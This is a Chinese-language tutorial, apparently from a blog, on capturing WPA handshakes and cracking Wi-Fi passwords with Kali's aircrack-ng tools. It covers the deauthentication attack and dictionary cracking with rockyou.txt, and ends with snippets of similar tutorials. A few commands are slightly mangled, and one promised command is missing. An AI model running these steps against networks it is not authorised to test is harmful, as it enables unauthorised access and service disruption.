準備工具
•筆記本一台vmware workstation15虛擬機器安裝•usb無線網絡卡【我用的是小公尺的】
•kali系統【可以在虛擬機器裡裝,建議用2023年及以下版本
可以參考
kali安裝
可以參考
wifi加密方式
1. wep(有線等效加密)——採用wep64位或者128位資料加密。
2.wpa-psk[tkip]———採用預共享秘鑰的wi-fi保護訪問,採用wpa-psk標準加密技術,加密型別為tkip。
3.wpa-psk[tkip]+wpa2-psk[aes]———允許客戶端使用wpa-psk[tkip]或者wpa2-psk[aes]。
start
一開啟虛擬機器,插入usb網絡卡,把網絡卡放到虛擬機器來
桌面右鍵,選擇open in terminal開啟終端
二顯示網絡卡資訊
開啟網絡卡監控
用ifconfig命令檢視一下網絡卡資訊
ifconfig
可以看到網絡卡的名字已經變了
三掃瞄wifi訊號
airodump-ng wlan0mon
拿到握手包
airodump-ng -w freedom -c 11 -–bssid 44:97:5a:f2:9e:b0 wlan0mon --ignore-negative-one
解釋:-c:指定通道[ch]
-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字
--bssid:指定路由器的mac
再開乙個終端輸入命令
aireplay-ng -0 10 -a 路由器mac -c 客戶機mac wlan0mon – -ignore-negative-one
使用airplay-ng工具強制斷開已經連線到wifi的裝置重新連線路由器,來進行抓去資料報
解釋:-0:指定傳送反認證包的個數(阿利伯數字0)
-a:指定路由器的mac
-c:指定客戶機的mac
出現下圖就是抓取成功
破解握手包
aircrack-ng -w dict freedom-*.cap
dict:字典的名字
freedom-*.cap:握手包
破解成功
補充•系統自帶了密碼字典,我用的是我自己的
字典位置如下:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists/rockyou.txt
最後乙個路徑下的檔案預設是壓縮的,可以通過以下命令解壓
•反向認證的原理是讓其中乙個客戶端下線,然後他再次連線,就可以獲取握手包•訊號掃瞄結束或者程序終止:ctrl+c
kali破解WIFI密碼
今天我們來學習一下通過kali和乙個好的字典來破解wifi密碼。宣告 此教程僅供學習研究使用,嚴禁使用此技術進行非法行為 首先我們需要乙個具有監聽功能的無線網絡卡 這裡我給大家推薦 rt3070 本章實驗通過虛擬機器vmware進行 先通過services.msc來開啟vmware usb arbi...
kali破解wifi密碼
開始 1 選擇合適的網絡卡,有些網絡卡kali識別不了,我用的網絡卡資訊 2 網絡卡開啟監聽模式 3 檢視監聽模式是否開啟成功 網絡卡名稱變成wlan0mon說明已經開啟成功 5 抓取握手包。命令格式 airodump ng c bssid w 輸入 airodump ng c 11 bssid 3...
kali無線wifi密碼破解
kali linux主要以滲透測試及 破解wifi密碼 聞名。裝置要求 這種攻擊需要字典檔案,乙個好的字典至關重要。我以kali linux自帶的rockyou字典為例,位於 user share wordlists rockyou.txt.gz。使用前先解壓 gzip d usr share wo...